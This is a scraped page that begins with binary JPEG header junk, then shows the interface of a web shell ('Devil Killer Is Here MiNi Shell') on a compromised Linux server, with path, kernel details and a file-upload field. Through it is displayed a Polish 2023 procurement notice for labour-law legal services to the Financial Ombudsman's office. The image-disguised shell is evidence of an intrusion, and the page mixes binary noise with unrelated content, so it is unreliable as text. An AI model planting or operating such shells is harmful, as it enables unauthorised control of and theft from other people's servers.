JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230302/0011917201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług obsługi prawnej Biura Rzecznika Finansowego z zakresu prawa pracy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">RZECZNIK FINANSOWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011335893</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowogrodzka 47A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-695</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">rf.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wspieranie klientów indywidualnych w sporach z podmiotami rynku finansowego </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Prawna Jerzy Pieróg &amp; Partnerzy</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">013109095</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Nowogrodzka 42 lok. 41</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">00-695</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">22 598 93 00</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">kancelaria@pierog.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.pierog.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług obsługi prawnej Biura Rzecznika Finansowego z zakresu prawa pracy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8934ce9a-b8f9-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00119172</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00109739/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 ŚWIADCZENIE USŁUG OBSŁUGI PRAWNEJ BIURA RZECZNIKA FINANSOWEGO Z ZAKRESU PRAWA PRACY</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pierog.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pierog.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W celu podpisania oferty, oświadczeń i dokumentów Wykonawca musi pobrać pliki z miejsca „Dokumentacja zamówienia”, podpisać je elektronicznie poza Platformą, a następnie załączyć podpisane pliki do oferty.<br/>2.	Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>1)	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3)	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4)	Włączona obsługa JavaScript;<br/>5)	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych stanowi załącznik nr 9 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych stanowi załącznik nr 9 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WAF-ZLA.281.55.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług obsługi prawnej Biura Rzecznika Finansowego z zakresu prawa pracy obejmujących następujący zakres:<br/><br/>1)	Opracowanie do 17 rodzajów kontraktów menedżerskich zawierających KPI (kluczowe wskaźniki efektywności) skupionych na kluczowych obszarach działalności Rzecznika Finansowego (RF) i obejmujących m.in.:<br/>a.	sprawniejsze działanie Wydziałów,<br/>b.	terminowość realizacji postawionych zadań, przy uwzględnieniu obiektywnych warunków ich wykonywania,<br/>c.	aktywność lub inicjatywę w ramach działań obejmujących działalność społeczną,<br/>d.	realizację zadań o charakterze niefinansowym ustalonych przez RF np. opracowywanie i przedstawianie RF opcji strategicznych dot. funkcjonowania Biura.<br/>UWAGA: Jako rodzaj kontraktu menedżerskiego Zamawiający rozumie kontrakt menedżerski odnoszący się do różnych, osobnych stanowisk. <br/><br/>Zamawiający oczekuje od Wykonawcy przeprowadzenia analizy potrzeb i wymagań w celu opracowania kluczowych wskaźników efektywności, opracowania kluczowych wskaźników efektywności, doboru najbardziej odpowiedniej formy prawnej kontraktów menedżerskich oraz opracowania postanowień kontraktów menedżerskich,<br/>	w terminie 30 dni od dnia zawarcia umowy.<br/><br/>2)	Przygotowanie procedur wewnętrznych Zamawiającego umożliwiających weryfikację KPI zawartych w kontraktach managerskich opracowanych w związku z pkt 1 powyżej wraz z narzędziami umożliwiającymi ich mierzenie.<br/>Procedury wewnętrzne Zamawiającego powinny określać sposób weryfikacji spełnienia / braku spełnienia ustalonych w kontraktach menedżerskich KPI oraz zawierać pełną dokumentację umożliwiającą ich monitorowanie. <br/>Na potrzeby przygotowania narzędzi umożliwiających mierzenie KPI Zamawiający dopuszcza możliwość wykorzystania przez Wykonawcę takich programów jak: Microsoft Power BI, Tabelau, Google Data Studio, Klipfolio itp.,<br/>	w terminie 30 dni od dnia zawarcia umowy.<br/><br/>3)	Przeprowadzenie do 16 okresowych weryfikacji (nie rzadziej niż 1 raz w kwartale kalendarzowym) wykonania KPI zawartych w kontraktach managerskich opracowanych w związku z pkt 1 powyżej, na podstawie procedur i narzędzi przygotowanych przez Wykonawcę w oparciu o pkt 2 powyżej.<br/>Zamawiający oczekuje od Wykonawcy przygotowywania prezentacji, raportów i podsumowań dotyczących wykonania kluczowych wskaźników efektywności przez kadrę menedżerską w poszczególnych kwartałach kalendarzowych, a także doradztwa i przygotowywania rozwiązań prawnych, związanych z brakiem wykonania lub nieprawidłowym wykonaniem kluczowych wskaźników efektywności przez poszczególnych członków kadry menedżerskiej,<br/>	w okresie obowiązywania umowy.<br/><br/>4)	Przygotowanie do 20 rodzajów wzorów umów o pracę zaktualizowanych do obowiązujących przepisów prawa, zgodnie z wykazem stanowisk, statutem i Regulaminem organizacyjnym przekazanym przez Zamawiającego po podpisaniu umowy,<br/>	w terminie 30 dni od dnia zawarcia umowy.<br/>UWAGA: Jako rodzaj umowy o pracę Zamawiający rozumie umowę o pracę odnoszącą się do różnych, osobnych stanowisk. <br/><br/>5)	Po opracowaniu przez Wykonawcę wzorów umów o pracę zgodnie z pkt 4 powyżej, Zamawiający oczekuje od Wykonawcy dalszego współdziałania w zakresie realizacji zadań, zaktualizowania procedur wewnętrznych Zamawiającego (Regulaminu pracy), przygotowywania aneksów, porozumień, pełnomocnictw i innych dokumentów dotyczących stosunku pracy, a także opiniowania rozwiązań dotyczących obszaru HR z perspektywy przepisów prawa pracy, w szczególności związanych z brakiem wykonania lub nieprawidłowym wykonaniem obowiązków pracowniczych i innych poleceń pracodawcy, w tym umów, a także sposobu, metod i warunków ich wypowiedzenia, wsparcia Zamawiającego w negocjacjach z działającymi u niego organizacjami związkowymi, w wymiarze do 60 h/mies.<br/><br/>Zamawiający oczekuje udzielania porad i konsultacji w formie telefonicznej oraz e-mailowej, odbywanie okresowych spotkań w formie zdalnej lub w siedzibie Wykonawcy, bądź Zamawiającego,<br/>	w okresie obowiązywania umowy.<br/><br/>6)	Bieżąca obsługa postępowań sądowych z zakresu prawa pracy w wymiarze do 20h/mies.<br/><br/>Przedmiot zamówienia obejmuje zapewnienie Zamawiającemu kompleksowego wsparcia w procesie obsługi postępowań sądowych z zakresu prawa pracy, udzielanie porad i konsultacji w formie telefonicznej oraz e-mailowej, odbywanie okresowych spotkań w formie zdalnej lub w siedzibie Wykonawcy, bądź Zamawiającego, bieżącą i stałą współpracę w przygotowaniu i prowadzeniu postępowań spornych z zakresu prawa pracy.<br/><br/>Zamawiający oczekuje od Wykonawcy weryfikacji otrzymywanych zgłoszeń pracowniczych, wsparcia w wyborze najbardziej odpowiedniej procedury i trybu postępowania w zakresie roszczeń ze stosunku pracy, przygotowywania pism procesowych, innych dokumentów lub oświadczeń w toku postępowań sądowych z zakresu prawa pracy, wsparcia lub zastępstwa Zamawiającego przed sądem, w rozmowach ugodowych, a także postępowaniach wyjaśniających z zakresu prawa pracy, weryfikacji przedmiotowych i podmiotowych środków dowodowych, innych składanych dokumentów lub oświadczeń pod względem formalno – prawnym w toku postępowań sądowych z zakresu prawa pracy.<br/>	w okresie obowiązywania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Publikacje naukowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe pełnomocnika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2.000.000,00 zł (słownie: dwa miliony złotych).<br/><br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>1)	w okresie ostatnich 5 lat liczonym wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie co najmniej dwa zamówienia, z których każde: obejmowało swym zakresem usługę bieżącej obsługi z zakresu prawa pracy świadczonej w sposób ciągły przez okres co najmniej 6 kolejnych miesięcy na rzecz podmiotu (pracodawcy) zatrudniającego co najmniej 50 pracowników;<br/><br/>2)	w okresie ostatnich 5 lat liczonym wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie co najmniej dwa zamówienia, z których każde obejmowało swym zakresem usługę, polegającą na opracowaniu:<br/>a) co najmniej dwóch rodzajów kontraktów menadżerskich zawierających KPI (kluczowe wskaźniki efektywności) lub dwóch procedur wewnętrznych umożliwiających weryfikację KPI zawartych w kontraktach menedżerskich, <br/>b) co najmniej dwóch rodzajów wzorów umów o pracę; <br/><br/>3)	dysponuje co najmniej 4 osobami, spośród których:<br/>a)	minimum 2 osoby posiadają co najmniej 12–miesięczne doświadczenie, zdobyte w okresie ostatnich 5 lat, liczonym wstecz od dnia, w którym upływa termin składania ofert, w bieżącej obsłudze z zakresu prawa pracy, świadczonej na rzecz co najmniej dwóch różnych podmiotów (pracodawców) zatrudniających co najmniej 50 pracowników;<br/>b)	minimum 2 osoby posiadają uprawnienia radcy prawnego lub adwokata* oraz występowały w charakterze pełnomocnika podmiotu (pracodawcy) zatrudniającego co najmniej 50 pracowników, w co najmniej 3 różnych postępowaniach sądowych z zakresu prawa pracy, które zakończyły się w okresie ostatnich 5 lat, liczonym wstecz od dnia, w którym upływa termin składania ofert, wydaniem prawomocnego rozstrzygnięcia sądu.<br/><br/>UWAGI: <br/>(1)	Jako zamówienie należy rozumieć usługę realizowaną na podstawie odrębnej umowy.<br/>(2)	Jako rodzaj kontraktu menedżerskiego albo umowy o pracę Zamawiający rozumie odpowiednio kontrakt menedżerski albo umowę o pracę odnoszącą się do różnych, osobnych stanowisk. <br/>(3)	Zamawiający nie dopuszcza możliwości wykazania się przez Wykonawcę tymi samymi osobami w celu spełnienia warunków udziału w postępowaniu, o których mowa w ust. 2 pkt 3 lit. a-b. <br/>(4)	Zamawiający dopuszcza, w celu spełnienia warunku udziału w postępowaniu, o którym mowa w ust. 2 pkt 3 lit. a, sumowanie doświadczenia osoby skierowanej do realizacji zamówienia zdobytego na rzecz różnych podmiotów (pracodawców). W przypadku niepełnych miesięcy doświadczenia danej osoby Zamawiający będzie sumował ilość dni, w których świadczona była usługa, przy zachowaniu zasady, zgodnie z którą jeden miesiąc liczy się za trzydzieści dni.<br/>(5)	W przypadku warunku udziału w postępowaniu, o którym mowa w ust. 2 pkt 3 lit. a, w zakresie dotyczącym doświadczenia w bieżącej obsłudze z zakresu prawa pracy Zamawiający nie dopuszcza sumowania okresów doświadczenia zdobytego równolegle (np. w sytuacji świadczenia bieżącej obsługi z zakresu prawa pracy od 01.03.2020 r. do 30.06.2020 r. jednocześnie na rzecz dwóch podmiotów).<br/>(6)	W celu spełnienia warunku udziału w postępowaniu, o którym mowa w ust. 2 pkt 3 lit. b, Zamawiający wskazuje, że przez różne postępowania sądowe z zakresu prawa pracy należy rozumieć postępowania oparte na różnych podstawach prawnych (rożne sygnatury i podstawy prawne roszczeń). <br/>(7)	W przypadku świadczeń powtarzających się lub ciągłych, które Wykonawca nadal wykonuje, wymagane jest, aby zrealizowany na dzień składania ofert zakres usługi (zamówienia) spełniał wymogi powyżej określonego warunku.<br/>(8)	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>(9)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>(10)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>(11)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 3 ustawy, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>(12)	W przypadku, o którym mowa w pkt 11 Uwag, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>(13)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 1 ustawy, każdy z warunków wskazanych w ust. 2 pkt 1-3 powyżej musi zostać samodzielnie spełniony przez co najmniej jednego z Wykonawców. Tożsama zasada dotyczy podmiotów udostępniających zasoby. Zamawiający nie dopuszcza wykazania spełnienia warunku wskazanego w ust. 2 pkt 1-3 poprzez sumowanie doświadczenia podmiotów w sytuacji, gdy udostępniane przez nich zasoby nie spełniają w całości wymagań, o których mowa w ust. 2 pkt 1-3.<br/><br/>*Zgodnie odpowiednio z ustawą z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz. U. z 2022 r. poz. 1166) 